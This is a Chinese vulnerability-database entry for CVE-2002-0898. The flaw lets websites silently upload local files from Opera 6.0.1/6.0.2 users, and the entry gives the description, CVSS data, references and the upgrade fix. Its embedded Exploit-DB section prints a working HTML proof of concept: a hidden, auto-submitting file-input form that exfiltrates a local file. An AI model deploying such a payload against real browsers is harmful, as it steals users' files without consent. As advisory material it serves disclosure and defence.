CVE-2002-0898
CVSS5.0
发布时间 :2002-10-04 00:00:00
修订时间 :2016-10-17 22:22:55
NMCOE    

[原文]Opera 6.0.1 and 6.0.2 allows a remote web site to upload arbitrary files from the client system, without prompting the client, via an input type=file tag whose value contains a newline.


[CNNVD]Opera本地文件泄露漏洞(CNNVD-200210-081)

        
        Opera是一款流行的Web浏览器,可使用在多种Unix和Linux操作系统下,也可运行在Microsoft Windows操作系统下。
        Opera在处理'file' HTML输入类型时存在漏洞,可导致远程攻击者获得Opera客户端系统中的任意文件。
        Opera浏览器支持类型,这是一个用于用户上载文件到HTTP服务器的标准模式,由于牵涉到安全问题,多数浏览器不允许设置"value"类型,如果此"value"设置为任意值,就可能导致攻击者服务器获得客户端系统的本地文件。
        而Opera支持设置"value"属性,不过在把文件发送到服务器时,会出现如下内容的对话框:
        The files listed below have been selected, without your intervention, to be sent to another computer. Do you want to send these files?"
        此安全机制存在漏洞,可导致攻击服务器绕过Opera的文件上载确认对话框,而下载Opera用户系统中任意文件。
        攻击者可以通过在文件元素"value"属性中的文件名后追加"
        "(HTML编码代表ASCII码中的换行符)而使Opera不出现文件上载确认提示框直接上载文件到服务器上,导致敏感信息泄露。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:opera_software:opera_web_browser:6.0.2::win32
cpe:/a:opera_software:opera_web_browser:6.0.1::win32

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0898
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0898
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-081
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=ntbugtraq&m=102256058220402&w=2
(UNKNOWN)  NTBUGTRAQ  20020527 Reading ANY local file in Opera (GM#001-OP)
http://online.securityfocus.com/archive/1/274202
(UNKNOWN)  BUGTRAQ  20020527 Reading ANY local file in Opera (GM#001-OP)
http://www.iss.net/security_center/static/9188.php
(VENDOR_ADVISORY)  XF  opera-browser-file-retrieval(9188)
http://www.opera.com/windows/changelog/log603.html
(UNKNOWN)  CONFIRM  http://www.opera.com/windows/changelog/log603.html
http://www.securityfocus.com/bid/4834
(VENDOR_ADVISORY)  BID  4834

- 漏洞信息

Opera本地文件泄露漏洞
中危 未知
2002-10-04 00:00:00 2005-05-16 00:00:00
远程  
        
        Opera是一款流行的Web浏览器,可使用在多种Unix和Linux操作系统下,也可运行在Microsoft Windows操作系统下。
        Opera在处理'file' HTML输入类型时存在漏洞,可导致远程攻击者获得Opera客户端系统中的任意文件。
        Opera浏览器支持类型,这是一个用于用户上载文件到HTTP服务器的标准模式,由于牵涉到安全问题,多数浏览器不允许设置"value"类型,如果此"value"设置为任意值,就可能导致攻击者服务器获得客户端系统的本地文件。
        而Opera支持设置"value"属性,不过在把文件发送到服务器时,会出现如下内容的对话框:
        The files listed below have been selected, without your intervention, to be sent to another computer. Do you want to send these files?"
        此安全机制存在漏洞,可导致攻击服务器绕过Opera的文件上载确认对话框,而下载Opera用户系统中任意文件。
        攻击者可以通过在文件元素"value"属性中的文件名后追加"
        "(HTML编码代表ASCII码中的换行符)而使Opera不出现文件上载确认提示框直接上载文件到服务器上,导致敏感信息泄露。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 不要使用Opera浏览访问不可信站点。
        厂商补丁:
        Opera Software
        --------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        下载使用Opera 6.0.3版本:
        Opera Software Opera Web Browser 6.0.1 win32:
        Opera Software Upgrade Opera 6.0.3
        
        http://www.opera.com/download/

        Opera Software Opera Web Browser 6.0.2 win32:
        Opera Software Upgrade Opera 6.0.3
        
        http://www.opera.com/download/

- 漏洞信息 (21483)

Opera 6.0.1/6.0.2 Arbitrary File Disclosure Vulnerability (EDBID:21483)
windows remote
2002-05-27 Verified
0 GreyMagic Software
N/A [点击下载]
source: http://www.securityfocus.com/bid/4834/info

A vulnerability has been reported in Opera 6.01/6.02. The vulnerability is related to handling of the 'file' HTML input-type. It is possible for a server to set the file value, while fooling Opera into thinking no file has been specified. This is possible if the filename is appended with the string "
". This HTML-encoded newline character will cause the browser to believe that no value has been set. Consequently, the form will be submitted and the specified file will be uploaded to the server. This may occur without knowledge or consent of the victim user.

Exploitation of this vulnerability allows for malicious webmasters to obtain arbitrary files from client systems. 

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:\test.txt&#10;"
style="visibility:hidden">
</form>
</body> 		

- 漏洞信息

5054
Opera File Tag Newline Arbitrary File Upload

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-04-09 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站